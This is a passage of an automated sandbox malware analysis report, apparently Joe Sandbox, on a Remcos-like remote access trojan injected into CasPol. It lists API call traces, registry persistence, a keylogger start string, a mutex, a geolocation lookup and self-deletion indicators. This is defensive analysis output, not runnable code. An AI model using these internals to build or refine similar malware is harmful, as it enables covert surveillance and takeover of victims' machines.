                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                • String ID: (32 bit)$ (64 bit)$8ZG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 782494840-1475859423
                                                                                                • Opcode ID: 30378f28f1fce7ab51d126630545fec285e61fc9a16d38ec9ca43c1eb06c91fb
                                                                                                • Instruction ID: 1adcdd06a104af508aeef54d465e0c78d2d81651f2e3fe11076ab4bcd17b792f
                                                                                                • Opcode Fuzzy Hash: 30378f28f1fce7ab51d126630545fec285e61fc9a16d38ec9ca43c1eb06c91fb
                                                                                                • Instruction Fuzzy Hash: 1811C660A001012AC704B3A6DCDBDBF765A9B91304F44413FB856A71E2FB6C9D9583EE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1725 41a726-41a765 call 401faa call 43aa9c InternetOpenW InternetOpenUrlW 1730 41a767-41a788 InternetReadFile 1725->1730 1731 41a78a-41a7aa call 401f86 call 402f08 call 401eea 1730->1731 1732 41a7ae-41a7b1 1730->1732 1731->1732 1733 41a7b3-41a7b5 1732->1733 1734 41a7b7-41a7c4 InternetCloseHandle * 2 call 43aa97 1732->1734 1733->1730 1733->1734 1738 41a7c9-41a7d3 1734->1738
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A749
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A75F
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A778
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A7BE
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A7C1
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A759
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: 43cdd9b38641346ff40a5bdbbdb1ee0a1e785e4de71221034d7e7d18a5dd2a6c
                                                                                                • Instruction ID: dd066ffe0ad47051801ff1a9504fa95a24023bf504f9cdcf24902ddc36d2e50e
                                                                                                • Opcode Fuzzy Hash: 43cdd9b38641346ff40a5bdbbdb1ee0a1e785e4de71221034d7e7d18a5dd2a6c
                                                                                                • Instruction Fuzzy Hash: C311947110A3126BD624EB169C85DBF7BECEF86765F00043EF845A2191DF68D848C6BA
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2099061454-0
                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID: pQG
                                                                                                • API String ID: 1958988193-3769108836
                                                                                                • Opcode ID: a8be8c16880439c766c810802cad88d1de10d530097162c07d361957ed4d994b
                                                                                                • Instruction ID: 007c54a35b5ab6fada7f5b2b4f31fda992404cc28ee9ac254c5285dcec39f6dc
                                                                                                • Opcode Fuzzy Hash: a8be8c16880439c766c810802cad88d1de10d530097162c07d361957ed4d994b
                                                                                                • Instruction Fuzzy Hash: 0911E730640B406AE720E724D88972F7B9AAB81316F44047EF18566AE3CA799CD5C29D
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004127B9
                                                                                                • RegSetValueExA.KERNEL32(?,XwF,00000000,?,00000000,00000000,00475308,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127E1
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: XwF$pth_unenc
                                                                                                • API String ID: 1818849710-1649331827
                                                                                                • Opcode ID: 9420bc3eb1ea7a2aa8b1acc341a66889fcb1330a5498be1c0862132d0ed0a7e5
                                                                                                • Instruction ID: b42ea712bc7a6ff48bd64609183fdbccf638e423d93a2202917fd6756948167f
                                                                                                • Opcode Fuzzy Hash: 9420bc3eb1ea7a2aa8b1acc341a66889fcb1330a5498be1c0862132d0ed0a7e5
                                                                                                • Instruction Fuzzy Hash: 27F06D32140204BBCB00AFA1DD45AEF3768EF00751B108169B916B60A1EE759E04EBA4
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2099061454-0
                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 2152742572-0
                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                APIs
                                                                                                • send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                • WaitForSingleObject.KERNEL32(000002B8,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                                                                • SetEvent.KERNEL32(000002B8,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                • String ID: {NAL
                                                                                                • API String ID: 3963590051-1903569844
                                                                                                • Opcode ID: 05599f562597249412011a16ecd0ed680b9dc7382a925f267c70d7f8e35f01ee
                                                                                                • Instruction ID: 09920f02ef31e30e393b68ef0c8285e211ae926702cc5adcda46913b737bad1c
                                                                                                • Opcode Fuzzy Hash: 05599f562597249412011a16ecd0ed680b9dc7382a925f267c70d7f8e35f01ee
                                                                                                • Instruction Fuzzy Hash: 552137B29005156BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EE78A504C6E4
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 465354869-4114347211
                                                                                                • Opcode ID: 0a0bf6aa005ba7d4a0539344149e6202bd61d1177f4d27376e40fa1d83bed449
                                                                                                • Instruction ID: 15e43fcc554e39227c644a0273f32637653ac1eeca6ef832bd6c9a92d0497390
                                                                                                • Opcode Fuzzy Hash: 0a0bf6aa005ba7d4a0539344149e6202bd61d1177f4d27376e40fa1d83bed449
                                                                                                • Instruction Fuzzy Hash: 0A1198B15003097AD224BA36CC86DBF7A5CDA813A8B40053EB845622D3EA785E14C6FB
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                                                                • RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: TeF
                                                                                                • API String ID: 1818849710-331424825
                                                                                                • Opcode ID: 69388a3f5ca785ef31159ee28a7932d701a8b17d3c2adace4bd37096d90c6bf5
                                                                                                • Instruction ID: 5082c9e4fe043c0a9a82c1e0a3a4def458545ef8caf92c2e29ea1f35f3ad8a86
                                                                                                • Opcode Fuzzy Hash: 69388a3f5ca785ef31159ee28a7932d701a8b17d3c2adace4bd37096d90c6bf5
                                                                                                • Instruction Fuzzy Hash: C9E03971640308BFDF119B919C05FDB3BA8EB04B95F004165FA05F61A1DAB1DE18EBA8
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: de027b18c27e353972bbb518c7116cfbecc430b549752cc6e4434d5af2f1cecf
                                                                                                • Instruction ID: 5371640f48c6a0368c7cea64887978d4ac2a240c02499e3407376e9d4191e8ff
                                                                                                • Opcode Fuzzy Hash: de027b18c27e353972bbb518c7116cfbecc430b549752cc6e4434d5af2f1cecf
                                                                                                • Instruction Fuzzy Hash: 10417171504301ABC700FB61CC55D7FBBE9AFD5315F00093EF892A32E2EE389909866A
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B7F6
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B80A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B817
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3604237281-0
                                                                                                • Opcode ID: 801f75d00fac8da0c66411ebabb5881698d5c73b15829ac97cd3568d121a9cb6
                                                                                                • Instruction ID: fca0af3f27241acfb9d15a16a542bc487c24adb9e916811621f81636ea96e045
                                                                                                • Opcode Fuzzy Hash: 801f75d00fac8da0c66411ebabb5881698d5c73b15829ac97cd3568d121a9cb6
                                                                                                • Instruction Fuzzy Hash: 1501F5712052057FE6105E249CC9EBB739CEB82B75F10063EF662D23C1DB25CC8686B9
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B852
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B877
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B885
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                • Opcode ID: 1a21255b847fbe2e331c6b2f646a75e08c9959ae533a89512b896340747af4bf
                                                                                                • Instruction ID: 2a104a3335fe37b36386f9496d9e2b25d881a91c22a4f34d2042fa75e5cfbfce
                                                                                                • Opcode Fuzzy Hash: 1a21255b847fbe2e331c6b2f646a75e08c9959ae533a89512b896340747af4bf
                                                                                                • Instruction Fuzzy Hash: 47F0C2B12422047FE6102F25AC89FBF3A5CDB86BA9F10023EF801A2291DE258C0581B9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
                                                                                                • String ID: NG
                                                                                                • API String ID: 180926312-1651712548
                                                                                                • Opcode ID: 644322f86688b88c1239a5b0cc18b827a5a9876979d79de84a3887397c7a2de8
                                                                                                • Instruction ID: 085b2f02be9ab0868ba51c73fb921716b1faa5b055701b3286f453889ed4f7a0
                                                                                                • Opcode Fuzzy Hash: 644322f86688b88c1239a5b0cc18b827a5a9876979d79de84a3887397c7a2de8
                                                                                                • Instruction Fuzzy Hash: C85182321042409AC624FB71D8A2AEF73E5AFD0304F00453FB94A671E2EF789949C69E
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040DA7D,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046656C,00000003,00000000), ref: 0040BEE6
                                                                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutex
                                                                                                • String ID: Rmc-ET2B3I
                                                                                                • API String ID: 1925916568-1125687456
                                                                                                • Opcode ID: b5077f7ec388620cf5be0ca51e32a1ab35e6e66f7e0f9972a02b1c78fa9675f2
                                                                                                • Instruction ID: 2210f0ff69d3cac9d22e7a3f14049619627ec1602d204fa864a150733b7892bf
                                                                                                • Opcode Fuzzy Hash: b5077f7ec388620cf5be0ca51e32a1ab35e6e66f7e0f9972a02b1c78fa9675f2
                                                                                                • Instruction Fuzzy Hash: B9D012702057009BE70817709D4E76D3951D784703F00407DB90BE51E1CEA488409519
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                                                                • RegCloseKey.KERNEL32(?), ref: 00412637
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: a01adbe8d93d7843240e1245e145c4eb73053e88c38affbd61dab3a9f8b8539c
                                                                                                • Instruction ID: 14faf112d3046a25d46051106a5b1d66d342437105d793e51b0bcc882fecfd0c
                                                                                                • Opcode Fuzzy Hash: a01adbe8d93d7843240e1245e145c4eb73053e88c38affbd61dab3a9f8b8539c
                                                                                                • Instruction Fuzzy Hash: D8F0D176900118BBCB209B91DD09EDF7B7CEB44B50F00406ABA05F2190DA749E599BA8
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 2290404c5028f19351fda844a65f428930317fa0cea8d3593e6495ca7ac6aa60
                                                                                                • Instruction ID: 218a6bf298efa18a53fa985214dbde7e418f837aa6fd6996b0f70a828ecfe766
                                                                                                • Opcode Fuzzy Hash: 2290404c5028f19351fda844a65f428930317fa0cea8d3593e6495ca7ac6aa60
                                                                                                • Instruction Fuzzy Hash: 6501AD35800229BFDF215F91DC09DDF7F38EF05760F004065BA08A20A0EB3589A9DBA4
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004125D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: f2bc15ec1dd87dd5d2b8e96f704feec537dddf8cd8f352820b88cb246238aa27
                                                                                                • Instruction ID: f1b1b21d3432ee16d2560aa6e8f8b6fc3b679f7482eced78fea8614e15db81c1
                                                                                                • Opcode Fuzzy Hash: f2bc15ec1dd87dd5d2b8e96f704feec537dddf8cd8f352820b88cb246238aa27
                                                                                                • Instruction Fuzzy Hash: B4F03075A00208BFDF119FA09C45FDEBBB8EB04B55F104065FA05F6191D670DA54DB94
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004670E0), ref: 0041255D
                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004670E0), ref: 00412571
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040B996,004670E0), ref: 0041257C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
